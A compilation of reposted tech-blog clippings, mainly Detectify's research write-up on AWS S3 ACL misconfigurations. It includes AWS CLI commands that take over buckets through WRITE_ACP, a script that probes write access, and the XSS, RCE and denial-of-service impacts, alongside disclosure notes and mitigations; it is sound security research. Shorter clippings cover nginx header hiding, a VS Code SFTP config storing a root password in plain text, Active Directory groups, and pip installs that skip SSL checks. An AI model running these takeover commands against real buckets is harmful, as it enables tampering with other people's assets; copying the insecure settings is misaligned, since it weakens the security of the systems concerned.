https://labs.detectify.com/writeups/a-deep-dive-into-aws-s3-access-controls-taking-full-control-over-your-assets/

A deep dive into AWS S3 access controls - Labs Detectify

Original research from Frans Rosen on vulnerabilities in AWS S3 bucket access controls, how to set them up properly, and how to monitor security.

labs.detectify.com

TL;DR: Setting up access control for AWS S3 involves multiple levels, each with its own unique risk of misconfiguration. We will go through the specifics of each level and identify the dangerous cases where weak ACLs create vulnerable configurations, affecting either the owner of the S3 bucket directly or third-party assets used by a lot of companies. We also show how to set things up properly and how to monitor for these sorts of issues.

A simplified version of this write-up is available on the Detectify blog.

Quick background

Amazon Web Services (AWS) provides a service called Simple Storage Service (S3) which exposes a storage container interface. The storage container is called a "bucket" and the files inside the bucket are called "objects". S3 provides unlimited storage for each bucket, and owners can use buckets to serve files. Files can be served either privately (via signed URLs) or publicly via an appropriately configured ACL (Access Control List) or ACP (Access Control Policy).
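
For example (a minimal sketch using the AWS CLI; bucket and key names are hypothetical), a private object can be shared through a time-limited signed URL:

# Anyone holding the printed URL can fetch the private object until the
# signature expires (here, after one hour).
$ aws s3 presign s3://example-bucket/private/report.pdf --expires-in 3600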

AWS also provides a CDN (Content Delivery Network) service called CloudFront, which is often configured to quickly serve S3-hosted files/objects from an optimized CloudFront server as close as possible to the user who is requesting the file.

Introduction

Recently, a few blog posts have mentioned scenarios where the misconfiguration of an S3 bucket may expose sensitive data, as well as explaining that S3 access control lists (ACLs) are quite different from the regular user permission setup in AWS, which is called Identity and Access Management (IAM).

However, we decided to approach this from a different angle. By identifying a number of different misconfigurations, we discovered that we could suddenly control, monitor, and break high-end websites due to weak configurations of bucket and object ACLs.

Disclaimer

All instances disclosed below were reported to the affected parties using responsible disclosure policies. In some of the cases, third party companies were involved and we got assistance from the companies affected to contact the vulnerable party.

We do not recommend testing any of the vulnerable scenarios below without prior approval. This is especially important in scenarios where the only way to identify the vulnerability is to actually overwrite files and configurations. We did, however, identify one method to detect one of the vulnerable setups without actually modifying the data. You should still make sure you're not affecting any party that has not given you written approval.

Technical details

The different misconfigurations and the impact of each depend on the following criteria:

  • Who owns the S3 bucket
  • What domain is being used to serve the files from the bucket
  • What type of files are inside the bucket

We will go through each of the different cases below and explain when a vulnerable misconfiguration can arise.

Identification of buckets

To start off, we need to be able to identify buckets owned by or used by the company. We need the specific bucket’s name to make signed requests to the bucket.

Identifying a bucket depends on the setup and on how the bucket is being reached: the request can go directly to S3, to CloudFront (or any other CDN proxy serving files from the bucket), to the S3 "Static Website" endpoint, and so on.

Some methods to identify S3-buckets are:

  • Look at the HTTP-response for a Server-header which says AmazonS3 (see the curl sketch after this list).
  • Request a random URL that doesn't exist and see if it gives you an S3-style 404, either with “Static Website enabled” or not, containing Access Denied or NoSuchKey.
  • The DNS-entry of the domain might reveal the bucket-name directly if the host points directly to S3.
  • Try accessing the root URL. If index listing is enabled (public READ on the bucket ACL), you will be able to see the bucket name defined in the <Name> element.
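
A minimal curl sketch of the Server-header check from the first bullet (hostname hypothetical); a host served straight from S3 answers with something like:

$ curl -sI https://assets.example.com/ | grep -i '^server:'
Server: AmazonS3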

We have identified multiple ways to make an S3 bucket actually reveal itself independently of any proxies in front of it. We have notified AWS about these methods and have chosen not to mention them above.

If you do find a domain that is pointing to a bucket but cannot get the bucket name, try the fully qualified domain name (FQDN) as the bucket name; naming the bucket after the domain that points to it is a common setup.

If this doesn’t work, try to:

  • Google the domain and see if any history of it exposes the bucket name.
  • Look at response headers of objects in the bucket to see if they have meta data that reveals the bucket name.
  • Look at the content and see if it refers to any bucket. We’ve seen instances where assets are tagged with the bucket name and a date when they were deployed.
  • Brute-force. Be nice here; don't shoot thousands of requests against S3 just to find a bucket. Try to be clever, based on the name of the domain pointing to it and the actual reason the bucket exists. If the bucket contains audio files for ACME on the domain media.acme.edu, try media.acme.edu, acme-edu-media, acme-audio or acme-media.

If the response on $bucket.s3.amazonaws.com shows NoSuchBucket you know the bucket doesn’t exist. An existing bucket will either give you ListBucketResult or AccessDenied.

(You might also stumble upon AllAccessDisabled; these buckets are completely dead.)
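
A minimal sketch that automates this check with curl (script name and candidate names are hypothetical):

#!/usr/bin/env bash
# check-bucket.sh: probe one candidate name, e.g. ./check-bucket.sh acme-media
bucket="$1"
body=$(curl -s "https://${bucket}.s3.amazonaws.com/")
case "$body" in
  *NoSuchBucket*)      echo "$bucket: does not exist" ;;
  *AllAccessDisabled*) echo "$bucket: exists, but completely dead" ;;
  *ListBucketResult*)  echo "$bucket: exists, listing allowed (public READ)" ;;
  *AccessDenied*)      echo "$bucket: exists, listing denied" ;;
  *)                   echo "$bucket: unexpected response" ;;
esac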

Remember, just because a bucket is named after the company or something similar, that doesn't mean it is owned by that company. Try to find references directly from the company to the bucket to confirm it is indeed owned by that specific company.

Permission/predefined groups

First, we will explore the different options that can be used for giving access to a requester of a bucket and the objects within:

ID / emailAddress

You are able to give access to a single user inside AWS using either the AWS user ID or their email address. This makes sense if you want to allow a single user to have specific access to the bucket.

AuthenticatedUsers

This is probably the most misunderstood predefined group in AWS S3’s ACL. Having the ACL set to AuthenticatedUsers basically means “Anyone with a valid set of AWS credentials”. All AWS accounts that can sign a request properly are inside this group. The requester doesn’t need to have any relation at all with the AWS account owning the bucket or the object. Remember that “authenticated” is not the same thing as “authorized”.

This grant is likely the most common reason a bucket is found vulnerable in the first place.
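
To illustrate (a hedged sketch; bucket name and profile are hypothetical): any valid AWS credentials, with no relationship whatsoever to the bucket owner's account, are enough to exercise an AuthenticatedUsers grant:

# signed with a personal AWS account that has no relation to the target
$ aws s3 ls s3://target-bucket --profile my-personal-account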

AllUsers

When this grant is set, the requester doesn't even need to make an authenticated request to read or write any data; anyone can make a PUT request to modify an object or a GET request to download one, depending on the policy that is configured.

Policy permissions / ACP (Access Control Policies)

The following policy permissions can be set on the bucket or on objects inside the bucket.

The ACPs on buckets and objects control different parts of S3. AWS has a list showing exactly what each grant does. There are further cases, not covered below, where you can create specific IAM policies for a bucket, called a bucket policy. Creating a bucket policy has its own issues; however, we will only cover the standard setup of ACLs set on buckets and objects.

READ

This gives the ability to read the content. If this ACP is set on a bucket, the requester can list the files inside the bucket. If the ACP is set on an object, the content can be retrieved by the requester.

READ will still work on specific objects inside a bucket, even if Object Access READ is not set on the complete bucket.

With the following ACL setup inside AWS S3:

(Screenshots omitted: the bucket ACL does not grant READ, while the object ACL does.)

We can still read the specific object:

$ aws s3api get-object --bucket test-bucket --key read.txt read.txt
{
    "AcceptRanges": "bytes", 
    "ContentType": "text/plain", 
    "LastModified": "Sun, 09 Jul 2017 21:14:15 GMT", 
    "ContentLength": 43, 
    "ETag": ""1398e667c7ebaa95284d4efa2987c1c0"", 
    "Metadata": {}
}

This means READ can be different for each object, independently of the settings on the bucket.

READ_ACP

This permission gives the ability to read the access control list of the bucket or object. If this is enabled, you can identify vulnerable assets without trying to modify the content or ACP at all.

READ_ACP will still work on specific objects inside a bucket, even if Object Access READ_ACP is not set on the complete bucket.

(Screenshots omitted: the bucket ACL does not grant READ_ACP, while the object ACL does.)
$ aws s3api get-object-acl --bucket test-bucket --key read-acp.txt        
{
    "Owner": {
        "DisplayName": "fransrosen", 
        ...

This means READ_ACP can be different for each object, independently of the settings on the bucket.

WRITE

This permission gives the ability to write content. If the bucket has this enabled for a user or group, that party can upload, modify and create new files.

WRITE will not work on specific objects inside a bucket if Object Access WRITE is not set on the complete bucket:

(Screenshots omitted: the object ACL grants WRITE, but the bucket ACL does not.)
$ aws s3api put-object --bucket test-bucket --key write.txt --body write.txt

An error occurred (AccessDenied) when calling the PutObject operation: Access Denied

However, if WRITE is set on the bucket, all objects will obey; they cannot individually decide whether they should be writable or not:

(Screenshots omitted: the bucket ACL grants WRITE; the object ACL does not matter.)
$ aws s3api put-object --bucket test-bucket --key write.txt --body write.txt
{
    "ETag": ""1398e667c7ebaa95284d4efa2987c1c0""
}

This means WRITE can be verified on a bucket in two ways: either by uploading a random file, or by modifying an existing one. Modifying an existing file is destructive and should not be done at all. Below we explain a way to check this without a destructive call, by triggering an error between the access-control check and the actual modification of the file.

WRITE_ACP

This permission gives the ability to modify the permission ACL of a bucket or object.

If the bucket has this enabled for a user or a group, that party can modify the ACL of the bucket, which is extremely bad. Having WRITE_ACP on a bucket completely exposes it to be taken over by the party holding the grant, meaning the content of any object can now be controlled by that party. The attacker might not be able to READ every object already in the bucket, but they can still fully replace the existing objects. Also, when the attacker claims ownership and removes the READ access on the bucket, the initial owner of the S3 bucket will get an Access Denied in the new AWS S3 console.

First, no access to READ_ACP or WRITE:

$ aws s3api get-bucket-acl --bucket test-bucket

An error occurred (AccessDenied) when calling the GetBucketAcl operation: Access Denied

$ aws s3api put-object --bucket test-bucket --key write-acp.txt --body write-acp.txt

An error occurred (AccessDenied) when calling the PutObject operation: Access Denied

Then we try to change the bucket ACL:

$ aws s3api put-bucket-acl --bucket test-bucket --grant-full-control emailaddress=frans@example.com && echo "success"
success

The initial owner of the bucket will now see this in the S3 console (screenshot omitted: the console shows Access Denied).

(Being the owner, they will still be able to modify the policy of the bucket, but this is a weird case anyway.)

We can now control everything:

$ aws s3api get-bucket-acl --bucket test-bucket
{
...
    "Grants": [
        {
            "Grantee": {
                "Type": "CanonicalUser", 
                "DisplayName": "frans", 
                "ID": "..."
            }, 
            "Permission": "FULL_CONTROL"

$ aws s3api put-object --bucket test-bucket --key write-acp.txt --body write-acp.txt
{
    "ETag": ""1398e667c7ebaa95284d4efa2987c1c0""
}

A very interesting thing is that WRITE_ACP will actually still work on specific objects inside a bucket even if Object Access WRITE_ACP is not set on the complete bucket:

(Screenshots omitted: the object ACL grants WRITE_ACP, while the bucket ACL does not.)
$ aws s3api put-object-acl --bucket test-bucket --key write-acp.txt --grant-write-acp uri=http://acs.amazonaws.com/groups/global/AuthenticatedUsers && echo "success"
success

Also, the opposite of WRITE applies here: having WRITE_ACP on the bucket doesn't mean you directly have WRITE_ACP on an object:

(Screenshots omitted: the bucket ACL grants WRITE_ACP, while the object ACL does not.)
$ aws s3api put-object-acl --bucket test-bucket --key write-acp.txt --grant-full-control emailaddress=frans@example.com

An error occurred (AccessDenied) when calling the PutObjectAcl operation: Access Denied

However, when you have WRITE_ACP on the bucket, performing the following steps will still give you full control over the content of any object, by replacing the existing object with new content:

  1. Modify the bucket ACL:
    $ aws s3api put-bucket-acl --bucket test-bucket --grant-full-control emailaddress=frans@example.com && echo "success"
    success
  2. Modify the object (This changes you to the owner of the object):
    $ aws s3api put-object --bucket test-bucket --key write-acp.txt --body write-acp.txt
    {
     "ETag": ""1398e667c7ebaa95284d4efa2987c1c0""
    }
  3. Modify ACP of the object again:
    $ aws s3api put-object-acl --bucket test-bucket --key write-acp.txt --grant-full-control emailaddress=frans@example.com && echo "success"
    success

Since WRITE still needs to be set on the bucket, you cannot upgrade WRITE_ACP on an object to give yourself WRITE on the same object:

$ aws s3api put-object-acl --bucket test-bucket --key write-acp.txt --grant-write-acp uri=http://acs.amazonaws.com/groups/global/AuthenticatedUsers --grant-write uri=http://acs.amazonaws.com/groups/global/AuthenticatedUsers --grant-read-acp uri=http://acs.amazonaws.com/groups/global/AuthenticatedUsers --grant-read uri=http://acs.amazonaws.com/groups/global/AuthenticatedUsers && echo "success"
success
(Screenshots omitted: the object ACL now grants READ, READ_ACP, WRITE and WRITE_ACP to AuthenticatedUsers.)

This will still give you:

$ aws s3api put-object --bucket test-bucket --key write-acp.txt --body write-acp.txt

An error occurred (AccessDenied) when calling the PutObject operation: Access Denied

However, you can still remove all ACPs on the object, making the object completely private, which will stop it from being served and give a 403 Forbidden.
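
A hedged sketch of that denial-of-service primitive (object name hypothetical; this is destructive, so never run it without approval):

# Reset the object's ACL to the canned "private" ACL, removing every public
# grant; the object will then return 403 Forbidden when served.
$ aws s3api put-object-acl --bucket test-bucket --key app.js --acl private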

WRITE_ACP can unfortunately only be verified by actually writing a new ACP to a bucket or object. Modifying the existing one is of course destructive and should not be done without approval. We have not found a non-destructive way of testing this ACP.

FULL_CONTROL

This is the permission that combines all the others. However, even with FULL_CONTROL set on an object, WRITE will still not work on that object unless WRITE is also set on the bucket.

Vulnerable scenarios

The following scenarios are cases where the company can be affected.

1. Bucket used on a domain owned by the company

You found a bucket which is served by a subdomain or domain of the company.

You should test for:

  • BUCKET READ
    Listing files in the bucket. Sensitive information might be exposed.
  • BUCKET READ-ACP
    Let’s look at the ACP and see if we can identify the bucket as vulnerable without actually trying anything. If we see that AllUsers or AuthenticatedUsers has WRITE_ACP set, we know we can gain full control over the bucket without doing anything else.
  • BUCKET WRITE (Simulate using the invalid-MD5 hack)
    Whether we can upload a new file to the bucket. This also tells us we can overwrite any object in the bucket. However, if we want to avoid uploading anything, we can try the following hack, which uploads nothing but still shows whether we would be able to:
    When making a signed PUT request to a bucket, we have the option to add a Content-MD5 header telling AWS the checksum of the content being uploaded. It turns out that this check happens inside the following flow:
    1. Check that the user has access to write the file.
    2. Check that the MD5 checksum matches the content.
    3. Upload the file.
    Since the checksum check happens after we know that we have access to the file, but before actually modifying it, we do not need to write to the file to know that we are able to.
    The following bash code simulates this scenario:

    # use this by: ./put-simulate.sh test-bucket/write.txt
    AWS_ACCESS_KEY_ID="***"
    AWS_SECRET_ACCESS_KEY="***"
    AWS_S3_BUCKET="$(echo "$1" | cut -d "/" -f1)"
    AWS_PATH="/$(echo "$1" | cut -d "/" -f2-)"
    date=$(date +"%a, %d %b %Y %T %z")
    acl="x-amz-acl:private"
    content_type='application/octet-stream'

    # we create a checksum of the word "yepp", but will upload a file with the content "nope".
    content_md5=$(openssl dgst -md5 -binary <(echo "yepp") | openssl enc -base64)

    string="PUT\n${content_md5}\n${content_type}\n${date}\n${acl}\n/${AWS_S3_BUCKET}${AWS_PATH}"
    signature=$(echo -en "${string}" | openssl sha1 -hmac "${AWS_SECRET_ACCESS_KEY}" -binary | base64)
    echo "PUT to S3 with invalid md5: ${AWS_S3_BUCKET}${AWS_PATH}"
    result=$(curl -s --insecure -X PUT --data "nope" \
      -H "Host: ${AWS_S3_BUCKET}.s3.amazonaws.com" \
      -H "Date: $date" \
      -H "Content-Type: ${content_type}" \
      -H "Content-MD5: ${content_md5}" \
      -H "$acl" \
      -H "Authorization: AWS ${AWS_ACCESS_KEY_ID}:${signature}" \
      "https://${AWS_S3_BUCKET}.s3.amazonaws.com${AWS_PATH}")

    if [ "$(echo ${result} | grep 'The Content-MD5 you specified did not match what we received')" != "" ]; then
      echo "SUCCESS: ${AWS_S3_BUCKET}${AWS_PATH}"
      exit 0
    fi
    echo "$result"
    exit 1

    On a bucket we can upload to, this will result in:

    $ ./put-simulate.sh test-bucket/write.txt
    PUT to S3 with invalid md5: test-bucket/write.txt
    SUCCESS: test-bucket/write.txt

    On a bucket we cannot upload to, this will result in:

    $ ./put-simulate.sh test-secure-bucket/write.txt
    PUT to S3 with invalid md5: test-secure-bucket/write.txt
    <?xml version="1.0" encoding="UTF-8"?>
    <Error><Code>AccessDenied</Code><Message>Access Denied</Message>

    We will therefore never modify the content, only confirm that we could have. This unfortunately only works for WRITE on objects, not for WRITE_ACP as far as we know.
  • BUCKET WRITE-ACP
    The most dangerous one: fully upgradable to full control of the bucket, but a destructive call, so be careful. The only way to test this properly is to first figure out how the bucket's current ACP looks, so as not to break anything. Remember that you can still have WRITE_ACP access even though you do not have READ_ACP.
    API-documentation reference
  • OBJECT READ
    We can try to read the content of interesting files found via BUCKET READ.
  • OBJECT WRITE
    No need to test this one, since BUCKET WRITE decides fully: if BUCKET WRITE gives an error, the object will not be writable, and if BUCKET WRITE succeeds, the object will always be writable.
    However, if the company using the bucket has an application where users can upload files, look at how the actual file upload to S3 is implemented. If the company uses a POST Policy upload, look specifically at the Condition Matching of the $key and the Content-Type in the policy. Depending on whether they use starts-with, you might be able to change the content type to HTML/XML/SVG or similar, or change the location the file is uploaded to (see the policy sketch after this list).
  • OBJECT WRITE-ACP
    We can try modifying the ACP of the specific object. This does not let us modify the content, only the access control of the file, giving us the ability to stop files from being served publicly.
    API-documentation reference
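
For illustration, a hedged sketch of what a risky POST Policy can look like (values hypothetical): with an empty starts-with prefix on both $key and Content-Type, the uploader can choose any object key and any content type, including text/html:

{
  "expiration": "2018-01-01T00:00:00Z",
  "conditions": [
    {"bucket": "acme-uploads"},
    ["starts-with", "$key", ""],
    ["starts-with", "$Content-Type", ""]
  ]
}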

Possible vulnerabilities:

  • Reflected XSS. If we can do BUCKET READ we can list assets and might find vulnerable objects, like a vulnerable SWF served on the company's domain.
  • Stored XSS / asset control. If we can do BUCKET WRITE or BUCKET WRITE-ACP (which also implies OBJECT WRITE) we can modify existing content or create new content, letting us modify javascript/css files or upload a new HTML file.
  • Denial of service. If we can modify the ACP of objects using OBJECT WRITE-ACP, we can prevent objects from loading publicly.
  • Information disclosure. If we can list objects we might find sensitive information.
  • RCE. If the bucket contains modifiable executables this can result in Remote Code Execution (RCE), depending on where the executables are being used and if/by whom they are being downloaded.

2. Assets from bucket used by the company

Additional Disclaimer: The assets being used by a company might not always be owned by the company. You need to be extremely careful here not to attack anyone other than the intended target who has given you permission to test.

There are projects that try to automate this, such as Second Order. However, Second Order only checks for assets referenced in the HTTP response; files loaded dynamically are not checked. Below is a quick example of also checking for dynamically loaded assets using Headless Chrome.

First, start the headless version on port 9222:

"/Applications/Google Chrome.app/Contents/MacOS/Google Chrome" --remote-debugging-port=9222 --disable-gpu --headless

We can then use a small script (context.js is borrowed from the HAR-capturer project, since that one properly closes tabs):

const CDP = require('chrome-remote-interface');
const URL = require('url').URL;
const Context = require('./context');

async function log_requests(orig_url) {
    const context = new Context({});

    process.on('SIGTERM', function () {
        context.destroy();
    });

    try {
        const client = await context.create();
        const {Network, Page} = client;
        const ourl = new URL('http://' + orig_url);
        const ohost = ourl.host;

        // Log every request the page makes (except data:-URIs) as
        // origin-host:asset-host:asset-url
        Network.requestWillBeSent((params) => {
            if (params.request.url.match('^data:')) {
                return;
            }
            const url = new URL(params.request.url);
            console.log(ohost + ':' + url.host + ':' + params.request.url);
        });
        await Promise.all([Network.enable(), Page.enable()]);
        // Load the page over both http and https to catch scheme-specific assets
        await Page.navigate({url: 'http://' + orig_url});
        await Page.loadEventFired();
        await Page.navigate({url: 'https://' + orig_url});
        await Page.loadEventFired();
    } finally {
        await context.destroy();
    }
}
const url = process.argv.slice(2)[0];
log_requests(url);

This gives us all assets on the page, which we can then use to figure out whether they are served from S3 or not.
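
A hedged follow-up sketch (the script filename and the output format above are assumed): resolve each asset host and flag the ones whose DNS points at S3:

$ node log-requests.js acme.com | cut -d: -f2 | sort -u | while read host; do
    dig +short CNAME "$host" | grep -qi 's3.*amazonaws\.com' && echo "$host -> S3"
  done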

You should test for the same things as in scenario 1.

Possible vulnerabilities:

  • Stored XSS / asset control. If we can do BUCKET WRITE or BUCKET WRITE-ACP (which also implies OBJECT WRITE) we can modify existing content or create new content, letting us modify javascript/css files or similar. This can be extremely bad depending on where the assets are being used, such as on login pages or main pages.
  • Denial of service. If we can modify the ACP of objects using OBJECT WRITE-ACP, we can prevent objects from loading publicly.
  • RCE. If assets are modifiable executables this can result in Remote Code Execution (RCE), depending on where the executables are being used and if/by whom they are being downloaded.

3. Bucket randomly found, indications it’s owned by the company

This one is a bit complicated. You need clear evidence and proof that the bucket is indeed owned by the company. Try to find references from the company pointing to this bucket, such as references on their website, CI logs, or open source code.

You should test for the same things as in scenario 1.

Possible vulnerabilities:

  • Stored XSS / asset control. If we can do BUCKET WRITE or BUCKET WRITE-ACP (which also implies OBJECT WRITE) we can modify existing content or create new content, letting us modify javascript/css files. However, in this case we don't know where the files are being used, so we cannot know how big the impact is without talking to the company.
  • Denial of service. If we can modify the ACP of objects using OBJECT WRITE-ACP, we can prevent objects from loading publicly. In this case, however, we do not know whether they are being loaded publicly anywhere.
  • Information disclosure. If we can list objects we might find sensitive information. Only do this if you have confirmed that the bucket is indeed connected to the company that gave you approval.
  • RCE. If the bucket contains modifiable executables this can result in Remote Code Execution (RCE), depending on where the executables are being used and if/by whom they are being downloaded.

Results

During this research we were able to confirm that we could control assets on high-profile websites. We reported these issues directly and they were solved quickly. The following categories of websites were affected:

  • Password managers
  • DNS/CDN providers
  • File storage
  • Gaming
  • Audio and video streaming providers
  • Health tracking

We identified vulnerable assets placed on the login pages of some companies.

In some cases, vulnerable assets were loaded using Google Tag Manager (gtm.js); however, the sites did not sandbox the third parties properly, running the third-party assets directly on the domain itself (instead of sandboxing them via www.googletagmanager.com).

We got in touch with some third-party providers, both directly and with help from the affected companies, and the issues were identified and solved very quickly.

How to stay safe

The following processes can prevent this issue from happening:

  1. Sandbox third party assets. As soon as you need third party assets, through gtm.js or similar, try isolating the scripts, either by using the iframe provided by Google Tag Manager or by placing them on a completely separate domain (not just a subdomain). Also ask your provider how they handle access control on their files, and whether they use S3 for file serving.
  2. If you have your own buckets, go through the bucket ACLs to verify that WRITE and WRITE_ACP are only set for specific users, never for groups such as AllUsers or AuthenticatedUsers (see the sketch after this list).
  3. The hardest fix is to prevent any object in any bucket from having WRITE_ACP. Test yourself by running an aws s3api put-object-acl with the appropriate settings, using a restricted AWS user, against your own objects in your own buckets. You might need to update the ACL on every object to mitigate this completely.
  4. Take a look and see how you are uploading objects to S3 buckets and make sure you set the proper ACLs on both buckets and objects.
  5. Do not use a secret bucket name as a form of Security through Obscurity. Treat the bucket name like it is already public information.
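
A minimal sketch of the ACL review from point 2 (bucket name hypothetical; the JMESPath filter keeps only group grantees, which are identified by a URI):

$ aws s3api get-bucket-acl --bucket my-bucket \
    --query "Grants[?Grantee.Type=='Group'].[Grantee.URI,Permission]" --output text
# Any line pairing .../groups/global/AllUsers or .../AuthenticatedUsers with
# WRITE or WRITE_ACP needs immediate attention.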

On a final note

After this research, it's clear that this problem is widespread and hard to identify and completely solve, especially if the company uses a huge number of buckets created by different systems. WRITE_ACP is the most dangerous permission, for the reasons mentioned above, on both buckets and objects.

An interesting detail: when manually uploading files to S3 using Cyberduck, this is what changing the access control on a file looks like (screenshot omitted). Pretty easy to accidentally pick the wrong one there.

Until next time.

What Detectify scans for

Detectify tests web applications for the following S3 misconfiguration vulnerabilities, with severities ranging from 4.4 to 9 on the CVSS scale:

  • Amazon S3 bucket allows for full anonymous access
  • Amazon S3 bucket allows for arbitrary file listing
  • Amazon S3 bucket allows for arbitrary file upload and exposure
  • Amazon S3 bucket allows for blind uploads
  • Amazon S3 bucket allows arbitrary read/writes of objects
  • Amazon S3 bucket reveals ACP/ACL

 


https://xinet.kr/?p=3478

 

Hiding the nginx version and header information (nginx: remove the server header)

xinet.kr

 

Hiding the nginx version information is, by default, simple to do in Nginx. With the default value of on, the configuration looks like this:

[root@xinet nginx-1.21.6]# vi /usr/local/nginx/conf/nginx.conf

### version hide
    server_tokens on;

With this configuration, the version is printed:

[root@xinet ~]# curl -IsL https://xinet.kr --insecure
HTTP/1.1 200 OK
Server: nginx/1.21.7
Date: Fri, 29 Apr 2022 06:58:54 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Set-Cookie: PHPSESSID=nv5flpefh076b2a92taf95u093; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Link: <https://xinet.kr/index.php?rest_route=/>; rel="https://api.w.org/"


To hide the version information, change the server_tokens value to off in nginx.conf:

[root@xinet nginx-1.21.6]# vi /usr/local/nginx/conf/nginx.conf

### version hide
    server_tokens off;

Restart nginx and check again:

[root@xinet ~]# systemctl restart nginx

[root@xinet ~]# curl -IsL https://xinet.kr --insecure
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 29 Apr 2022 07:02:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Set-Cookie: PHPSESSID=1ljq6md9ngrd6q7pm3njstrlst; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Link: <https://xinet.kr/index.php?rest_route=/>; rel="https://api.w.org/"

This hides the version number.

Check it from a web page as well.

The header still shows the value nginx for Server, and this can be hidden too. It is done by adding a module; the module to use is ngx_security_headers.

Download it, then build and add the module.

[root@xinet ~]# cd /usr/local/src/

If the originally installed nginx source is not present, download it; if it is, go to the original build folder to build and copy the module:

[root@xinet src]# cd nginx-1.21.6/

[root@xinet nginx-1.21.6]# ./configure --with-compat --add-dynamic-module=/usr/local/src/ngx_security_headers

[root@xinet nginx-1.21.6]# make modules

[root@xinet nginx-1.21.6]# cp -a objs/ngx_http_security_headers_module.so /usr/local/nginx/modules/

Once the module has been copied, add it to the configuration:

[root@xinet nginx-1.21.6]# vi /usr/local/nginx/conf/nginx.conf

load_module modules/ngx_http_security_headers_module.so;

### header hide
    hide_server_tokens on;

Restart nginx and check with curl; the Server information is no longer shown:

[root@xinet ~]# systemctl restart nginx

[root@xinet ~]# curl -IsL https://xinet.kr --insecure
HTTP/1.1 200 OK
Date: Fri, 29 Apr 2022 06:52:39 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Set-Cookie: PHPSESSID=ukiujk8i29fo97enqlr4fops2i; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Link: <https://xinet.kr/index.php?rest_route=/>; rel="https://api.w.org/"


Check in a Chrome web page as well.

If nginx was installed via yum, install the packages below, confirm the module has been added, and then use it:

yum -y install https://extras.getpagespeed.com/release-latest.rpm

yum -y install nginx-module-security-headers

load_module modules/ngx_http_headers_more_filter_module.so;

http {
    ...
    more_clear_headers Server;
    ...
}

 


https://dev-blackcat.tistory.com/1

 

[VSCODE] Connecting Visual Studio Code with SFTP

dev-blackcat.tistory.com

 

First, click the Extensions tab, search for "SFTP", and install the extension shown in the image below. (Screenshot omitted.)

 

Open a new folder or an existing project folder, press "F1", search for "sftp", and select "sftp:config". (Screenshot omitted.)

 

A ".vscode" folder is created as shown below, containing an "sftp.json" file. (Screenshot omitted.)

 

Some properties are missing in the initially generated file. Compare with the example below and add them.

Option: Description
uploadOnSave: Automatically upload on save (true/false).
ignore: Files and folders to exclude from upload/download. Since the files inside the ".vscode" folder contain the server account's password, this is set in most cases for security.
{
    "name": "project name",
    "host": "server IP address",
    "protocol": "sftp",
    "port": 22,
    "username": "server account",
    "password": "server password",
    "remotePath": "server directory root",
    "uploadOnSave": true,
    "watcher": {
        "files": "**/*",
        "autoUpload": true,
        "autoDelete": true
    },
    "ignore": [
        "**/.vscode",
        "**/.git",
        "**/.DS_Store",
        "**/.sftp.json",
        "**/node_modules"
    ]
}

 

Example

Press "F1" again and select "sftp:Download Project" to download the project.

{
    "name": "TEST Project",
    "host": "01.234.567.890",
    "protocol": "sftp",
    "port": 22,
    "username": "root",
    "password": "123456",
    "remotePath": "/root/test",
    "uploadOnSave": true,
    "watcher": {
        "files": "**/*",
        "autoUpload": true,
        "autoDelete": true
    },
    "ignore": [
        "**/.vscode",
        "**/.git",
        "**/.DS_Store",
        "**/.sftp.json",
        "**/node_modules"
    ]
}
 
 
 

https://tryhackme.com/room/winadbasics

 

TryHackMe | Active Directory Basics

This room will introduce the basic concepts and functionality provided by Active Directory.

tryhackme.com

 

It's about time to get started...

 

Several groups are created by default in a domain that can be used to grant specific privileges to users. As an example, here are some of the most important groups in a domain:

Security Group: Description
Domain Admins: Users of this group have administrative privileges over the entire domain. By default, they can administer any computer on the domain, including the DCs.
Server Operators: Users in this group can administer Domain Controllers. They cannot change any administrative group memberships.
Backup Operators: Users in this group are allowed to access any file, ignoring their permissions. They are used to perform backups of data on computers.
Account Operators: Users in this group can create or modify other accounts in the domain.
Domain Users: Includes all existing user accounts in the domain.
Domain Computers: Includes all existing computers in the domain.
Domain Controllers: Includes all existing DCs on the domain.

You can obtain the complete list of default security groups from the Microsoft documentation.

 

블로그 이미지

wtdsoul

,

Fiddler setup

 

Fiddler on an internal network

Options > HTTPS > Decrypt

Connections > confirm port 8888 > open 127.0.0.1 in the browser > install the certificate

Gateway > Manual Proxy Config > 127.0.0.1:8080 (the Burp port number)

Enable Capturing (F12), then receive the packets through Burp.


https://seonu-lim.github.io/python/%EC%98%A4%ED%94%84%EB%9D%BC%EC%9D%B8%EC%97%90%EC%84%9C-%ED%8C%8C%EC%9D%B4%EC%8D%AC%ED%8C%A8%ED%82%A4%EC%A7%80-%EC%84%A4%EC%B9%98%ED%95%98%EA%B8%B0/

 

Installing Python packages while offline?

seonu-lim.github.io

 

At the place I moved to, we use something called VDI (Virtual Desktop Infrastructure) for security reasons. It's my first time encountering it, so I'm not used to it yet. In principle, all internal data exists only inside the VDI, and data can only be taken out with approval. The internal messenger and mail can also only be checked inside the VDI... and on top of that, there is no internet access except for the company homepage!

In such a closed environment, there are also difficulties in using Python as a development or analysis tool. Installing packages normally means using pip or conda, but with no internet connection, downloading packages becomes a really cumbersome task. To make matters worse, I'm currently in charge of Python training at the company, so I have to make it possible for people who know nothing to install packages in the VDI. I will therefore describe the simplest method possible.

First, since the local computer used to access the VDI can reach the internet except for a few sites, install the desired package locally first. However, on our company's network, a plain pip install foo fails with some SSL certificate error, so add the following arguments:

pip --trusted-host pypi.org --trusted-host files.pythonhosted.org install foo

After installing it like this, create a folder, open a shell, and move into it. Then download the package as follows:

pip --trusted-host pypi.org --trusted-host files.pythonhosted.org download foo

The folder will contain the foo package file together with its dependencies. Move them to the VDI via the file transfer system. Assuming the VDI only has Python installed, save the transferred files to a specific path and open a shell:

python -m pip install --no-index -f . foo

If you get an error, check whether the Python version that downloaded the whl files differs from the Python version into which you are trying to install the packages.
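
A hedged variant for moving many packages at once (assuming a requirements.txt listing them):

# on the online machine: download wheels for every requirement into ./wheels
pip --trusted-host pypi.org --trusted-host files.pythonhosted.org download -r requirements.txt -d ./wheels

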